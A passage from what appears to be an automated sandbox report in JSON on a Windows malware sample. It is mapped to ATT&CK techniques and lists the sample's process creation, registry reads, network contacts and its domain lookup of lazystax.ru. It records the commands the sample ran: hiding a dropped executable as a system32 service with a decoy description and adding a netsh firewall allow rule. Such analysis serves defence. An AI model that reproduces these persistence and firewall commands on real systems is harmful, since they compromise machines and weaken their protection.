"\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003208)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\fbjtauwa\\\" - (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\ctbzjelz.exe\" %WINDIR%\\system32\\fbjtauwa\\\" - (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create fbjtauwa binPath= \"%WINDIR%\\system32\\fbjtauwa\\ctbzjelz.exe /d\\\"C:\\8ae432a105ad4d956dd273e90e\" - (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description fbjtauwa \"wifi internet conection\"\" - (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start fbjtauwa\" - (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00003208)\n \"ctbzjelz.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00002972)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-275", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a named pipe", "description": "\"svchost.exe\" called \"CreateNamedPipeA\" with parameter \"\\\\.\\pipe\\uqyipjlp\"\n dwOpenMode: \"1073741827\"\n dwPipeMode: \"0\" - (UID: 00000000-00002232)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\ctbzjelz.exe\" %WINDIR%\\\\system32\\\\fbjtauwa\\\\\" (UID: 00000000-00004704)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1\" has an executable section named \".text\"\n \"ctbzjelz.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1\" has an writable section named \".data\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1\" has an writable section named \".text\"\n \"ctbzjelz.exe\" has an writable section named \".data\"\n \"ctbzjelz.exe\" has an writable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xb20000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xcb7000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"ctbzjelz.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1\" was detected as \"VC8 -> Microsoft Corporation\"\n \"ctbzjelz.exe\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"ctbzjelz.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\ctbzjelz.exe]- [targetUID: 00000000-00004704]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"ctbzjelz.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" reads file \"c:\\8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe.Local\\\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\8AE432A105AD4D956DD273E90E99A0DC0A40677214B896F1A38DE4E5F4A2ECA1.EXE.LOCAL\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"COM+ENABLED\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"INPROCSERVER32\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"THREADINGMODEL\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"MAXSXSHASHCOUNT\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: \"FIRSTRUNCOMPLETE\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n 